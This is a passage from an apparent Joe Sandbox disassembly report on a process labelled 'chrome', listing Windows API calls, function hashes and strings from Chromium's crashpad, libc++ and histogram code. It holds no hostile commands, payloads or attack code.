                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D9
                                                      • Part of subcall function 00D491B0: UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491E2
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,?,?,?,?,?,00D48DC9), ref: 00D49200
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D4922E
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49258
                                                      • Part of subcall function 00D491B0: CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49282
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$ExclusiveLockWait$ConditionMaskReleaseUnregister$AcquireCompletionCreateObjectQueuedSingleStatusThread$InfoVerifyVersion_strlen
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$CreateNamedPipe$CreateThread$Free$Run
                                                    • API String ID: 2114208606-1806101671
                                                    • Opcode ID: 37aef64fa82ffaa57cd41fc50b2e6da770a5eb488a8c3b3b9435c890617a147e
                                                    • Instruction ID: 0b592abd183ab7d26f3dff03d89ecc5d250684e7a7b94e9e7708ae00f1ec43e9
                                                    • Opcode Fuzzy Hash: 37aef64fa82ffaa57cd41fc50b2e6da770a5eb488a8c3b3b9435c890617a147e
                                                    • Instruction Fuzzy Hash: D7F1C6B1A043409FC710DF25D88192FB7E5EF99750F08492DF999A7292DB70ED48CBA2
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00E25A5E
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E26038, 00E265C2
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00E2603F, 00E265A4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 2882836952-3013800257
                                                    • Opcode ID: 98d6c29038d8fc4607d3a9a9f604ff68b2ced211be4ecba17e339514d82ae61d
                                                    • Instruction ID: 4aa6d0f42c74c36196803d1e3bb44a3f661f672db6b4d35ca09fb7ce8522ef3d
                                                    • Opcode Fuzzy Hash: 98d6c29038d8fc4607d3a9a9f604ff68b2ced211be4ecba17e339514d82ae61d
                                                    • Instruction Fuzzy Hash: 3F725C716083419FC708CF28D59562AFBE6FBC8314F149A2EF899A73A1D770D845CB52
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00E1A5A5
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00E1A791
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1A8C7
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1AAAC
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00E1AAD5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E1AAF8
                                                    • _strlen.LIBCMT ref: 00E1ACF0
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00E1AD5F
                                                    Strings
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00E1AF32
                                                    • T, xrefs: 00E1AE99
                                                    • T, xrefs: 00E1ADB4
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00E1AFF1
                                                    • Blink.UseCounter, xrefs: 00E1AEE9
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00E1AED8
                                                    • T, xrefs: 00E1ADE3
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E1AF4F
                                                    • Histogram.BadConstructionArguments, xrefs: 00E1AF7C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T$T$T
                                                    • API String ID: 1657474455-705546750
                                                    • Opcode ID: d006eda63b6d7a583f3241fceceaa6003529afe26fefb668887b39ac24a40f02
                                                    • Instruction ID: 96dc336a1fc0f3e2f8395fb15679b555d2660a9cb7860e419a4a9014c0db452a
                                                    • Opcode Fuzzy Hash: d006eda63b6d7a583f3241fceceaa6003529afe26fefb668887b39ac24a40f02
                                                    • Instruction Fuzzy Hash: 8052A275E012148FDB24CF24D8817FDB7B6AB89314F199069E80ABB352D731ADC5CB92
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB5F03
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB5F40
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DB5FE9
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?), ref: 00DB60E0
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB61B0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB61ED
                                                    • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DB622F
                                                    Strings
                                                    • @KL, xrefs: 00DB6270
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB62E6
                                                    • ..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB6829
                                                    • @KL, xrefs: 00DB62A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$Release
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\optional:800: assertion this->has_value() failed: optional operator* called on a disengaged value$@KL$@KL
                                                    • API String ID: 2252595807-3005847224
                                                    • Opcode ID: f3cb063b4655d6aeede8bb46de1fd72e5744bcf87e0e717466e11015c77ead9c
                                                    • Instruction ID: f5e2185064cefcf4bb23854a0d489049cce7b237a4225f41028e6029664be22a
                                                    • Opcode Fuzzy Hash: f3cb063b4655d6aeede8bb46de1fd72e5744bcf87e0e717466e11015c77ead9c
                                                    • Instruction Fuzzy Hash: 02729271A04740CFDB19CF18D481AAAB7E5FF88300F09896DE98A5B366D734ED45CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB832D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB8414
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8728
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8741
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB875A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB877E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB878F
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87A0
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87B1
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87C2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87D3
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87E7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB87F9
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB884F
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8860
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB8879
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB888A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB88A3
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DB88E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$ExclusiveLock$Acquire$Release
                                                    • String ID:
                                                    • API String ID: 1097530104-0
                                                    • Opcode ID: df484071b1b25121535674bfa8abf98102f6ee9d9e298df193420aa37a6c36cf
                                                    • Instruction ID: 383043c70319a1b6b6989ee8a55438927ffc0d8c527444b84dea8a30a0e5da51
                                                    • Opcode Fuzzy Hash: df484071b1b25121535674bfa8abf98102f6ee9d9e298df193420aa37a6c36cf
                                                    • Instruction Fuzzy Hash: A2322935E0021ACFCB14CF68C4846EAF7B6BF88310F298569D856BB351DB30AD45DBA1
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00DF10B5
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF123C
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1372
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1508
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF1534
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1557
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DF17D2
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF1968
                                                    Strings
                                                    • T, xrefs: 00DF1806
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF192E
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF1994
                                                    • T, xrefs: 00DF18E8
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DF190A
                                                    • T, xrefs: 00DF1835
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Release$Acquire$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Histogram.MismatchedConstructionArguments$T$T$T
                                                    • API String ID: 576647242-436863712
                                                    • Opcode ID: ec15527c65858c12fc6c220ceb79a5302b85035eb076511006d1d9ac8be4313c
                                                    • Instruction ID: 9845c80b10f005aa660a114e91429406434141ed1ec5fdd43d147935421f9d0f
                                                    • Opcode Fuzzy Hash: ec15527c65858c12fc6c220ceb79a5302b85035eb076511006d1d9ac8be4313c
                                                    • Instruction Fuzzy Hash: 1452D379E00259DFDB14CF64D881A7DB7B6BF85300F19C069EA4AAB352D730AD45CBA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBE850
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBEB12
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000010,?,00004000,?,00000000), ref: 00DBEBD1
                                                      • Part of subcall function 00DA8000: ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DA8170
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBECEA
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBED75
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBE889
                                                      • Part of subcall function 00DA8000: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 860d25c2bf0cb7beec946b2188113302100ff04a62d9efab5cb5b4658f5e5bd9
                                                    • Instruction ID: 0dcf8f21f04ded86fa0698134f8a4ab378d6388338371fe223e4c554bc38cc30
                                                    • Opcode Fuzzy Hash: 860d25c2bf0cb7beec946b2188113302100ff04a62d9efab5cb5b4658f5e5bd9
                                                    • Instruction Fuzzy Hash: 2182C375604741DFD718DF24C884BAAB7E2FF88314F19866DE88A5B292D730EC45CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,F1645913), ref: 00DB39CB
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,F1645913), ref: 00DB3B6A
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB4AB6
                                                    • T, xrefs: 00DB4A6E
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB4AC5
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB4AD4
                                                    • 1U!S, xrefs: 00DB3C3B
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DB4AE3
                                                    • 1U!S, xrefs: 00DB3CBD
                                                    • T, xrefs: 00DB4A40
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$1U!S$1U!S$T$T
                                                    • API String ID: 17069307-503978395
                                                    • Opcode ID: 2f0c108981a825e881a83581b96485934949ed74d1e7dbea8659432ee6e4e38e
                                                    • Instruction ID: 1a8a7267849412969f0c0b3842f7ed04f909c442c618f3e9c2eeb7a930e912d2
                                                    • Opcode Fuzzy Hash: 2f0c108981a825e881a83581b96485934949ed74d1e7dbea8659432ee6e4e38e
                                                    • Instruction Fuzzy Hash: AEA28075E00215CFDB24CF28D8907A9B7B2FF85304F198699D94AAB346DB30AD85CF61
                                                    APIs
                                                    • VerSetConditionMask.KERNEL32 ref: 00D4968B
                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00D49697
                                                    • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003,?,00000001,00000003), ref: 00D496A3
                                                    • VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 00D496C3
                                                    • LocalFree.KERNEL32(?), ref: 00D497FF
                                                    • CreateNamedPipeW.KERNEL32 ref: 00D4987A
                                                    • SetLastError.KERNEL32(00000000), ref: 00D49915
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc, xrefs: 00D498BD, 00D4993A
                                                    • ConvertStringSecurityDescriptorToSecurityDescriptor, xrefs: 00D498CF
                                                    • LocalFree, xrefs: 00D498FA
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_local_alloc.cc, xrefs: 00D498E8
                                                    • BuildSecurityDescriptor, xrefs: 00D4994C
                                                    • D:(A;;GA;;;SY)(A;;GWGR;;;S-1-15-2-1)S:(ML;;;;;S-1-16-0), xrefs: 00D4974E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ConditionMask$ExclusiveLock$AcquireCreateErrorFreeInfoLastLocalNamedPipeReleaseVerifyVersion
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_local_alloc.cc$BuildSecurityDescriptor$ConvertStringSecurityDescriptorToSecurityDescriptor$D:(A;;GA;;;SY)(A;;GWGR;;;S-1-15-2-1)S:(ML;;;;;S-1-16-0)$LocalFree
                                                    • API String ID: 2435325764-909682083
                                                    • Opcode ID: d35de8fa3ac1dd75f66b340c18b2ec33b053e045c5d059bd1b82f1415414af2c
                                                    • Instruction ID: 4c9438afb06d18c3e4117d39719429ac8251474ee4a1982628a955737d35cdbf
                                                    • Opcode Fuzzy Hash: d35de8fa3ac1dd75f66b340c18b2ec33b053e045c5d059bd1b82f1415414af2c
                                                    • Instruction Fuzzy Hash: 758184B1A003599FE714DF16DC55BAAB7B8FB85700F0441A9F5087B291DB709E48CB61
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF9840
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF9863
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DF9B51
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF9CC4
                                                      • Part of subcall function 00DB75E0: _strlen.LIBCMT ref: 00DB75FF
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF9C19
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF9C4B
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF9C12
                                                    • Blink.UseCounter, xrefs: 00DF9BE2
                                                    • 0Q, xrefs: 00DF9772, 00DF9B5C
                                                    • T, xrefs: 00DF9BB6
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00DF9BD1
                                                    • Histogram.BadConstructionArguments, xrefs: 00DF9C33
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
